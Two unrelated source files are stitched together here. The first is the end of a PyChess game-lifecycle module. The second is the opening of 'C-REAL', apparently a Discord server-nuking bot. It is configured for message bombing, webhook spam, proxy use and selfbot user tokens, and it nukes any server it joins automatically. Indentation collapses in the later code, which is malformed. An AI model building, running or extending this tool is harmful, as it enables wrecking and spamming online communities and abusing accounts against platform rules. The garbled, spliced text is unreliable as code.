                        gamemodel.players[0].emit("offer", offer)
                    else:
                        gamemodel.players[1].emit("offer", offer)
                return False

            if not gamemodel.isLoadedGame():
                message.add_button(InfoBarMessageButton(_("Play Rematch"), 1))
            if (
                gamemodel.status in UNDOABLE_STATES
                and gamemodel.reason in UNDOABLE_REASONS
            ):
                if gamemodel.ply == 1:
                    message.add_button(InfoBarMessageButton(_("Undo one move"), 2))
                elif gamemodel.ply > 1:
                    message.add_button(InfoBarMessageButton(_("Undo two moves"), 2))

        message.callback = callback
        gmwidg.game_ended_message = message

        perspective = perspective_manager.get_perspective("games")
        if len(perspective.key2gmwidg) > 0:
            gmwidg.replaceMessages(message)

        if reason == WHITE_ENGINE_DIED:
            self.engineDead(gamemodel.players[0], gmwidg)
        elif reason == BLACK_ENGINE_DIED:
            self.engineDead(gamemodel.players[1], gmwidg)

        if (
            (isinstance(gamemodel, ICGameModel) and not gamemodel.isObservationGame())
            or gamemodel.isEngine2EngineGame()
            or (isinstance(gamemodel, LearnModel) and not gamemodel.failed_playing_best)
        ):
            create_task(gamemodel.restart_analyzer(HINT))
            create_task(gamemodel.restart_analyzer(SPY))
            if not conf.get("hint_mode"):
                gamemodel.pause_analyzer(HINT)
            if not conf.get("spy_mode"):
                gamemodel.pause_analyzer(SPY)
        return False

    def on_game_started(self, gamemodel, gmwidg):
        """Prepare the widget when a game starts: orient the board, play the
        setup sound, wire local players' offers, and start analyzers."""
        # offline lectures can reuse same gamemodel/gamewidget
        # to show several examples inside the same lecture
        if gamemodel.offline_lecture:
            gmwidg.clearMessages()

        # Rotate to human player
        boardview = gmwidg.board.view
        if gamemodel.players[1].__type__ == LOCAL:
            if gamemodel.players[0].__type__ != LOCAL:
                boardview.rotation = math.pi
        if isinstance(gamemodel, LearnModel):
            if gamemodel.orientation == BLACK:
                boardview.rotation = math.pi
            else:
                boardview.rotation = 0

        # Play set-up sound
        preferencesDialog.SoundTab.playAction("gameIsSetup")

        # Connect player offers to infobar
        for player in gamemodel.players:
            if player.__type__ == LOCAL:
                self.offer_cids[gamemodel][player] = player.connect(
                    "offer", self.offer_callback, gamemodel, gmwidg
                )

        # Start analyzers if any
        if not gamemodel.isEngine2EngineGame():
            create_task(gamemodel.start_analyzer(HINT))
            create_task(gamemodel.start_analyzer(SPY))
            if not conf.get("hint_mode"):
                gamemodel.pause_analyzer(HINT)
            if not conf.get("spy_mode"):
                gamemodel.pause_analyzer(SPY)
        return False

    # ===============================================================================
    # Player signals
    # ===============================================================================

    def offer_callback(self, player, offer, gamemodel, gmwidg):
        """Show a dismissable infobar note confirming the offer a local
        player just sent."""
        if gamemodel.status != RUNNING:
            # If the offer has already been handled by Gamemodel and the game was
            # drawn, we need to do nothing
            return
        message = ""
        if offer.type == ABORT_OFFER:
            message = _("You sent an abort offer")
        elif offer.type == ADJOURN_OFFER:
            message = _("You sent an adjournment offer")
        elif offer.type == DRAW_OFFER:
            message = _("You sent a draw offer")
        elif offer.type == PAUSE_OFFER:
            message = _("You sent a pause offer")
        elif offer.type == RESUME_OFFER:
            message = _("You sent a resume offer")
        elif offer.type == TAKEBACK_OFFER:
            message = _("You sent an undo offer")
        elif offer.type == HURRY_ACTION:
            message = _("You asked your opponent to move")
        elif offer.type == FLAG_CALL:
            message = _("You sent flag call")
        else:
            return

        def response_cb(infobar, response, message):
            message.dismiss()
            return False

        content = InfoBar.get_message_content("", message, Gtk.STOCK_DIALOG_INFO)
        message = InfoBarMessage(Gtk.MessageType.INFO, content, response_cb)
        gmwidg.replaceMessages(message)
        return False

    # ===============================================================================
    # Subfunctions
    # ===============================================================================

    def engineDead(self, engine, gmwidg):
        """Bring the widget to the front and show an error dialog telling the
        user the engine process died."""
        gmwidg.bringToFront()
        dialog = Gtk.MessageDialog(
            mainwindow(), type=Gtk.MessageType.ERROR, buttons=Gtk.ButtonsType.OK
        )
        dialog.set_markup(_("<big><b>Engine, %s, has died</b></big>") % repr(engine))
        dialog.format_secondary_text(
            _(
                "PyChess has lost connection to the engine, probably because it has died.\n\n \
You can try to start a new game with the engine, or try to play against another one."
            )
        )
        dialog.connect("response", lambda dialog, r: dialog.hide())
        dialog.show_all()


game_nanny = GameNanny()
|
<gh_stars>0
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 - 2021
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Don't use the bot on real servers or use it to spam because this is breaking
discord's ToS, and you will be resulted in an account deletion.
"""
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
grant_all_permissions = False
# normal functions==============
def exit():
    """Wait for the user to press enter, then terminate with exit status 1.

    NOTE: deliberately shadows the ``exit`` builtin; callers throughout this
    file rely on this name for the pause-then-quit behavior.
    """
    try:
        input('Press enter to exit...')
    except (EOFError, KeyboardInterrupt):
        pass
    sys.exit(1)
def banner():
    """Handler for non-unicode consoles"""
    # Write the ASCII-art logo straight to the raw stdout buffer as utf-8 so
    # it renders even when the console encoding cannot handle the box glyphs.
    sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
# Check for > 1.5.1 discord version
# (features used below require discord.py 1.5.1+; bail out early otherwise)
if version.parse('1.5.1') > version.parse(discord.__version__):
    print('Please update your discord.py.')
    exit()

# Default configuration; any .json config loaded by setUp() is merged over
# these keys via settings.update(...).
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
    """Interactively load or create the bot configuration.

    Looks for ``data/default.json`` (and any other ``data/*.json``), shows a
    timed menu to pick one, merges the chosen file into the module-level
    ``settings`` dict, and finally snapshots ``settings_copy`` so unsaved
    changes can be detected later (see configIsSaved()).
    """
    # check location
    from glob import glob
    config = None
    config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
    config_path = os.path.join(config_parent_dir, 'default.json')
    json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))

    def getConfig(choice, timeout):
        # Menu loop: returns a parsed config dict, or None when the user
        # opts to create a new config (choice 3) or loading fails.
        while True:
            # it really doesn't matter if I use triple quotes or not.... the speed is going to be the same and doing this looks better
            print('=========================')
            print('| |')
            print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
            print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
            print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
            print('| |')
            print('=========================')
            print('[x] = not Available;')
            try:
                response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
            except TimeoutOccurred:
                # No input before the deadline: auto-pick default.json.
                response = '1'
            if response == '1':
                if not os.path.isfile(config_path):
                    print(f'Unable to find file: {config_path}')
                    continue
                with open(config_path, 'r', encoding='utf8') as f:
                    try:
                        return json.loads(f.read())
                    except json.decoder.JSONDecodeError:
                        print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
                        break
            elif response == '2':
                while True:
                    print('=========================')
                    print('0) Go back')
                    for i, path in enumerate(json_paths):
                        print(f'{str(i+1)}) {path}')
                    index = input('Select the .json file.\n>> ')
                    if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
                        print(f'You need to enter an integer that is between or on 0 and {str(len(json_paths))}')
                        continue
                    if index == 0:
                        # Back to the main menu; disable the auto-boot timer.
                        timeout = 999999
                        break
                    with open(json_paths[index-1], 'r', encoding='utf8') as f:
                        try:
                            return json.loads(f.read())
                        except json.decoder.JSONDecodeError:
                            print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
            elif response == '3':
                break

    global settings, settings_copy
    if os.path.isfile(config_path): # have default.json
        config = getConfig([1,2,3], 5)
    elif len(json_paths) > 0: # dont have default.json but have other .json file
        config = getConfig([2,3], 999999)
    if config is not None:
        settings.update(config)
    else:
        # No config chosen: ask for the bare minimum (token + owner) inline.
        try:
            # from getpass import getpass
            # settings['token'] = getpass('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
            settings['token'] = input('Enter token. If you are new refer to this guide: https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/wiki/Basic-setup-and-knowledge-for-using-the-bot\n>> ')
            settings['permissions'].append(input('\nEnter your discord tag or user ID. It is recommended to use discord user ID because some unicode names are hard for the code to check.\n>> '))
        except KeyboardInterrupt:
            sys.exit(0)
        except EOFError:
            print('Invalid input/EOFError. This may be caused by some unicode.')
            exit()
    print('\nTips:')
    print('The default command_prefix is: .')
    print(f'Your currect command_prefix is: {settings["command_prefix"]}')
    print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
    print('Join our discord https://discord.gg/FwGWvwv4mW')
    settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
    """Re-derive the four want_log_* bit flags from settings['verbose']."""
    global want_log_request, want_log_console, want_log_message, want_log_errors
    v = settings['verbose']
    want_log_request = v & 0b0001
    want_log_console = v & 0b0010
    want_log_message = v & 0b0100
    want_log_errors = v & 0b1000
updateVerbose()
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
    """Validate *token* (default: settings['token']) against the Discord API.

    Tries plain user ("selfbot") authorization first, then "Bot <token>";
    on success sets the module-level ``headers`` and ``is_selfbot`` flags,
    on failure prints a message and exits the process.
    """
    if token is None:
        token = settings['token']
    global is_selfbot, headers
    try:
        headers = {'authorization': token, 'content-type': 'application/json'}
        print('Checking selfbot token.', end='\r')
        # A valid /users/@me response contains an 'id' field.
        if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
            # This is the hardest thing that I have tried to find in my life took me ages to know "Bot <token>" is actually the bot's authorization
            # Reading source codes is always a good thing :)
            headers['authorization'] = 'Bot ' + token
            print('Checking normal bot token.', end='\r')
            if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
                print('Invalid token is being used.')
                exit()
            else:
                is_selfbot = False
    # except requests.exceptions.ProxyError:
    #     print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
    #     exit()
    # except requests.exceptions.ConnectTimeout:
    #     print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
    #     exit()
    except requests.exceptions.ConnectionError:
        print('You should probably consider connecting to the internet before using any discord related stuff. If you are connected to wifi and still seeing this message, then maybe try turn off your VPN/proxy/TOR node. If you are still seeing this message or you just don\'t what to turn off vpn, you can try to use websites like repl/heroku/google cloud to host the bot for you. The source code is on https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
        exit()
    except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
        print('Invalid token is being used.')
        exit()
# Validate the configured token (sets headers / is_selfbot) before logging in.
checkToken()

### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
    print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case retrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
    # Callable prefix so a runtime change to settings['command_prefix'] could
    # take effect without restarting the bot.
    return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
# NOTE(review): the static prefix string is passed below instead of
# determine_prefix, so runtime prefix changes will not apply — confirm intent.
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
    """Gateway connection established: grant the account owner permission
    when running as a selfbot, build the sorted command list used by the
    help pages, and apply the configured presence."""
    if is_selfbot:
        for user in settings['permissions']:
            if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
                global selfbot_has_perm
                selfbot_has_perm = True
        settings['permissions'].append(str(client.user.id))
    global sorted_commands
    # Fix: sort by the full command name; the previous key (e.name[0]) only
    # compared the first character, leaving same-letter commands unordered.
    sorted_commands = sorted(client.commands, key=lambda e: e.name)
    await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
    # Client cache is ready: print the banner plus a summary of identity,
    # permitted users, prefix, and (for real bots) the OAuth invite URL.
    banner()
    print('/+========================================================')
    print(f'| | {Fore.GREEN}Bot ready.')
    print(f'| {Fore.MAGENTA}+ Logged in as')
    print(f'| | {client.user.name}#{client.user.discriminator}')
    print(f'| | {client.user.id}')
    print(f'| {Fore.MAGENTA}+ Permission given to ')
    for permission in settings['permissions']:
        print(f'| | {permission}')
    print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
    if is_selfbot:
        print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
    else:
        print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
    print('| ~*************************************')
    print('\\+-----')
@client.event
async def on_disconnect():
    '''
    on_disconnect - runs when the client loses its connection to Discord.
    Usage: reset the account's presence back to offline.
    '''
    await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
    """Report *message* to the invoking Discord context.

    Honors the 'message' verbosity bit. Messages longer than Discord's
    2000-character limit raise HTTPException and are re-sent recursively in
    2000-character slices; any other send failure falls back to the console.
    """
    if not want_log_message:
        return
    try:
        await ctx.send(message)
    except discord.errors.HTTPException:
        # Over the 2000-char limit: resend in 2000-char chunks.
        for i in range(ceil(len(message) / 2000)):
            await log(ctx, message[2000 * i:2000 * (i + 1)])
    except Exception:
        # Fix: previously a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit; narrowed to Exception.
        consoleLog(message)
def consoleLog(message, print_time=False):
    """Print *message* to the terminal when console logging is enabled,
    optionally prefixed with a colored HH:MM:SS timestamp; falls back to a
    raw utf-8 buffer write for characters print() cannot handle."""
    if not want_log_console:
        return
    prefix = ''
    if print_time:
        prefix = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
    try:
        print(f'{prefix}{message}')
    except TypeError:  # character the console encoding cannot represent
        sys.stdout.buffer.write(f'{prefix}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
    # source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
    # source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
    """
    Error handlers

    Dispatches on the exception type: unknown commands are echoed back to
    permitted users, permission failures are silenced, and anything else is
    logged best-effort to Discord with a console fallback.
    It's always a good idea to look into the source code to find things that are hard to find on the internet.
    """
    # Debug mode
    # raise error
    if not want_log_errors or hasattr(ctx.command, 'on_error'):
        return
    # get the original exception
    error = getattr(error, 'original', error)
    # print(error)
    # print(str(type(error)))
    if isinstance(error, commands.CommandNotFound):
        if checkPerm(ctx):
            try:
                await log(ctx, f'Command `{ctx.message.content}` is not found.')
            except discord.errors.HTTPException:
                # message content too long to echo back verbatim
                await log(ctx, 'That command is not found.')
    elif isinstance(error, commands.CheckFailure):
        pass
    elif isinstance(error, discord.Forbidden):
        await log(ctx, f'403 Forbidden: Missing permission.')
    elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
        # has already been handled in "def log"
        pass
    elif isinstance(error, commands.UserInputError):
        await log(ctx, 'Invalid input.')
    else:
        # 'args', 'code', 'response', 'status', 'text', 'with_traceback'
        # print(error)
        # print(error.args)
        # print(type(error.args))
        try: # Don't want too many things logged into discord
            await log(ctx, '%s' % error.args)
        except discord.errors.NotFound: # When ctx.channel is deleted
            pass
        except TypeError: # When there's a charater that can't be logged into discord. Like if error.args contains a tuple which can't be automatically turned into a string.
            consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
    # Selfbots receive no command events from discord.py's default pipeline,
    # so commands are dispatched manually from raw messages.
    @client.event
    async def on_message(message):
        if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
            # The account owner is only allowed when listed in permissions.
            if message.author.id == client.user.id and not selfbot_has_perm:
                consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t of the power to use this bot.', True)
                return
            # self_bot mode only processes commands authored by this account.
            message.author = client.user
            await client.process_commands(message)
@client.event
async def on_guild_join(guild):
    # When nuke-on-join is armed, select the freshly joined guild and nuke
    # it using the ctx saved by the arming command.
    if nuke_on_join:
        global selected_server
        selected_server = guild
        await nuke(saved_ctx)
def isDM(ctx):
    """Return True when *ctx* originates from a direct-message channel
    rather than a guild channel (some commands need different handling)."""
    return isinstance(ctx.channel, discord.channel.DMChannel)
def nameIdHandler(name):
    """Strip Discord mention markup from *name*.

    ``<@!ID>`` (user ping) and ``<@&ID>`` (role ping) both become the bare
    ``ID`` string; anything else is returned untouched.
    """
    if name[:3] in ('<@!', '<@&'):
        return name[3:-1]
    return name
async def embed(ctx, n, title, array):
    """Send one page of *array* as a two-column (Name/ID) Discord embed.

    Parameters:
    ctx   - command context the page is sent to
    n     - 1-based page number as a string; validated and converted here
    title - embed title / command name
    array - objects exposing .name and .id attributes

    Falls back to a plain code-block message when the embed cannot be sent.
    """
    if not n.isdigit() or (n := int(n) - 1) < 0:
        await log(ctx, 'Bad page number.')
        return
    names = ''
    ids = ''
    item_length = len(array)
    if item_length == 0:
        return await ctx.send(f'{title} count: 0')
    init_item = n * per_page
    final_item = init_item + per_page
    if init_item > item_length - per_page:
        if init_item > item_length:
            await ctx.send('Invalid page number.')
            return
        # last page: only the remaining items
        final_item = init_item + (item_length % per_page)
    else:
        final_item = init_item + per_page
    for i in range(init_item, final_item, 1):
        item = array[i]
        # truncate long names so the two columns stay aligned
        if len(item.name) > 17:
            item.name = item.name[:17] + '...'
        names += f'{item.name}\n'
        ids += f'{str(item.id)}\n '
    # if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
    #     names = names.split('\n')
    #     ids = ids.split(' ')
    #     consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
    # else:
    try:
        theColor = randint(0, 0xFFFFFF)
        embed = discord.Embed(
            title = title,
            description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
            color = theColor
        )
        embed.add_field(name='Name', value=names, inline=True)
        embed.add_field(name='ID', value=ids, inline=True)
        embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
        await ctx.send(embed=embed)
    except:
        # NOTE(review): bare except — any failure (not just missing embed
        # permission) falls through to the plain-text rendering.
        names = names.split('\n')
        ids = ids.split(' ')
        await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
async def hasTarget(ctx):
    """
    Return True when a server is selected for subsequent commands.

    When invoked from inside a guild with no selection yet, auto-connects to
    that guild; when invoked from a DM with no selection, logs instructions
    and returns False.
    """
    if selected_server is not None:
        return True
    elif not isDM(ctx):
        await connect(ctx)
        await log(ctx, f'You have been automatically `{settings["command_prefix"]}connect` to server `{selected_server.name}` because you are not connected to a server and using a command inside a server.')
        return True
    else:
        await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
        return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more infomation about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
for aliase in command.aliases:
help_command += f'|{aliase}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', alises=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', alises=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
